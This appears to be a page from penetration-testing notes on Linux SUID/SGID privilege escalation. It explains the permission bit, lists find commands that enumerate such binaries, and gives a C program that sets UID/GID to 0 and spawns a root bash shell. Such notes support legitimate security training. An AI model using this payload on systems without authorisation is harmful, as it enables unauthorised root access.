SUID/SGID Binaries

SUID Binaries

SUID binaries have a special filesystem permission that allows them to execute with the user ID (UID) of the file owner. An obvious example is sudo, which allows you to run commands as the root user uid=0:

-rwsr-xr-x 1 root root 306456 Jun 30 01:55 /usr/bin/sudo

Finding SUID/SGID binaries is simple enough with a find search:

find / -perm -u=s -type f 2>/dev/null # SUID only
find / -perm /u=s,g=s -type f 2>/dev/null # SUID and SGID

While most binaries are exploitable by themselves, there are times where you may need to make your own. Remember to call the setuid(0) function prior to executing your payload:

#include <unistd.h>
int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}

PreviousLinux Privilege Escalation NextCredential Hunting

Last updated 3 months ago